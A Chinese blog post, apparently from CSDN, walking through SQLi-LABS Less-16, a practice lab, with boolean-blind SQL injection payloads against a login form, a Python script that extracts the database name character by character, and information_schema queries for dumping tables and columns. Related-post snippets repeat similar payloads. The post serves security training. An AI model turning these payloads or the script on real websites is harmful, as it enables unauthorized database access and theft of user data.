SQLi LABS Less 16 布尔盲注

原创 已于 2024-06-23 18:09:20 修改 · 1.2w 阅读 · 7 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全 #渗透测试 #web安全 #安全
于 2021-08-14 20:49:00 首次发布
本文介绍了一位网络安全专家如何利用布尔盲注技术破解登录系统的实例,通过逐层分析和Python脚本自动化,演示了如何在双引号括号注入中获取数据库信息。

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第十六关是双引号+括号的字符型注入,推荐使用布尔盲注

一、功能分析

一个简单的登录功能,输入用户名和密码点击登录,后台接收参数查询数据库。

如果用户名和密码存在,页面提示登录成功。

如果用户名和密码不存在,页面提示登录失败。

二、思路分析

 参数携带单双引号,页面不显示数据库的报错信息,不适合报错注入。

由于不知道真实的用户名和密码,这里使用万能账号尝试登录。

登录成功后,页面不返回查询的内容(返回写死的图片),不适合联合注入。

使用错误的密码登录(登录失败),页面响应与登录成功时不同,可以尝试布尔盲注。

三、解题步骤

方式一:布尔盲注

参考文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

用户名输入:a") or 1 -- a

密码随便输入:1,页面正常显示(登录成功)

用户名输入:a") or 0 -- a

密码随便输入:1,页面异常显示(登录失败)

由此可以确定,页面存在双引号+括号的字符型注入。 

第二步、判断长度

判断当前使用数据库名字的长度,是否大于1,用户名输入:

a") or length(
	(database())
) >1 -- a

 

 长度肯定大于1,页面正常显示,确定payload可用。

从1开始依次递增长度并进行验证,手动验证比较麻烦,稍后使用脚本猜解。

第三步、枚举字符

截取当前使用数据库名字的第一个字符,转换成ASCLL,判断字符的ASCLL码是否大于1,用户名输入:

a") or ascii(
	substr(
		(database())
	,1,1)
) >1 -- a

 

字符的ASCLL码肯定大于1,页面正常显示,确定payload可用。

依次判断字符的ASCLL是否等于(32~126)。

确定第一个字符内容后,再依次判断其余字符,手动猜解效率太低,稍后使用脚本猜解。

脱库

Python自动化猜解脚本如下,可按需修改:

import requests

# 网站路径
url = "http://f7773a7d5fd24ace9094c5e0c5c06b7a.app.mituan.zone/Less-16/"
# 判断长度的payload
payload_len = """a") or length(
	(database())
) ={n} -- a"""
# 枚举字符的payload
payload_str = """a") or ascii(
	substr(
		(database())
	,{l},1)
) ={n} -- a"""

# post请求参数
data= {
    "uname" : "a') or 1 -- a",
    "passwd" : "1",
    "submit" : "Submit"
}

# 判断长度
def getLen(payload_len):
    length = 1
    while True:
        # 修改请求参数
        data["uname"] = payload_len.format(n = length)
        response = requests.post(url=url, data=data)
        # 出现此内容为登录成功
        if '../images/flag.jpg' in response.text:
            print('测试成功,长度为:', length)
            return length;
        else:
            print('正在测试长度:', length)
            length += 1


# 枚举字符
def getStr(length):
    str = ''
    # 从第一个字符开始截取
    for l in range(1, length+1):
        # 枚举字符的每一种可能性
        for n in range(32, 126):
            data["uname"] = payload_str.format(l=l, n=n)
            response = requests.post(url=url, data=data)
            if '../images/flag.jpg' in response.text:
                str += chr(n)
                print('第', l, '个字符枚举成功:',str )
                break

length = getLen(payload_len)
getStr(length)

执行结果如下:

其余脱库操作时,将下面圈中的部分替换为SQL语句即可:

 

常用的脱库语句:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema='security'
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema='security' and table_name='users'

sqli-labs16(基于post提交的双引号加括号闭合的布尔盲注)通思路
zyh1588的博客
11-11 1140
小白回顾sql靶场第16
Sqli-labs靶场第16详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1167
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
SQL-labs的第16——布尔盲注
qq_73393033的博客
07-19 372
接下来我么只需要改变substr函数的第二个参数,将它改成2,3,4(获得数据库名的第2,3,4个字母),然后通过该语句我么可以获得完整的数据库名。这说明users这数据表的第一列的列名的第一个字母是u,我们可以通过该方法或完整的列名以及其他的列名。中的0,来看其他表名的长度,将0改成1,2,3就可以看到第2,3,4数据表名的长度。中的第二个1将它换成2,3,4,就可以确定数据表名的第2,3,4个字母是什么了。这说明users这个数据表中的username列的第一个数据的长度为4。说明该网站的闭合方式为。
sql-labs靶场第十六测试报告
ccc_9wy的博客
10-18 1820
sql-labs第十六的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;盲注。
sqli-labs16
hcja666的博客
02-18 370
随便写写。
sqli-labs-Less-16 布尔盲注
yzcn
11-13 272
Less-16 布尔盲注 利用burp suite进行抓包 利用hackba插件中的post data进行注入 方法一:布尔盲注 判断注入点: uname=") or 1=1 # &passwd=&submit=Submit 显示登录成功,说明闭合方式为(“”),存在注入漏洞 猜解当前数据库名: 猜解数据库名长度: uname=") or length(database())>5# &passwd=&submit=Submit 第一个字母:uname=") or
SQLi LABS Less 16 布尔盲注_sql-libs16
2401_84264727的博客
05-17 664
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqli-labsLess-16卡详细解析
最新发布
qq_62000508的博客
07-31 311
SQL注入实战:Less-16卡时间盲注分析 本文详细记录了Less-16SQL注入的完整过程。该卡采用字符串型注入(POST请求),需用")闭合参数。通过分析发现无回显信息,选择时间盲注技术。文章分步骤演示了如何获取数据库信息:首先确定数据库名"security"及其长度;然后获取表名"users";接着提取字段"username"和"password";最后获取数据内容。每个步骤都提供了具体的SQL注入语句
SQL注入靶场(16-20
2401_88387979的博客
12-11 1278
通过源码可以猜测本的闭合方式为 ")
生命在于折腾——SQL注入的实操(四)less16-20
易水哲的博客
08-20 417
sql-lib项目,本篇文章介绍16-20。
sqli-labs靶场第十六
gou1791241251的博客
12-27 872
第十六:闭合方式为")。其余获取信息操作与其他卡一致
基于Sql-Labs靶场的SQL注入-11~16
Joker
12-31 1024
这里我讲述了POST提交方式的注入方法,用到的注入类型为联合注入、报错注入、布尔盲注三种。
sql-labs16 非常详细
ChenD的学习笔记
10-07 733
sql-lab靶场前16
sqli-labs第十六
yuqnqi的博客
05-09 347
输入admin") and if(length(database()=8),sleep(5),1) #延时五秒,说明猜对了,数据库位数为8。页面无报错无回显,需要查看源码。字母s的ASCII码是115。由源码知,双引号反括号闭合。一个字母一个字母的尝试吧。继续时间盲注猜数据库名。本为双引号反括号闭合。像这样继续猜解不断尝试。延时5秒说明猜对了.
sqllab第十六笔记
I_WORM的博客
03-14 918
构造payload:username=a")+or+if((mid((select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security'),1,1)='e'),sleep(2),1)#放入爆破模块中,设置不变(这里没测数据长度,我直接用的50,假设目标长度<50,那么结果中有效的payload1不会到50,如果有效payload1到了50说明长度>=50,此时我会增加长度;
sqli-lab-less16
Sa1nZen的博客
08-03 225
sqli-lab-less16
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 23万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs(十四)(十五)(十六)
qq_65950075的博客
05-04 404
输入1",出现如下报错信息,告诉我们要双引号闭合所以我们输入1" or 1=1#没有任何返回信息,这一和十三一样,利用报错信息爆出数据。
SQLI-LABS Less-15 到 Less-16
Web学习之路
03-24 224
布尔盲注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值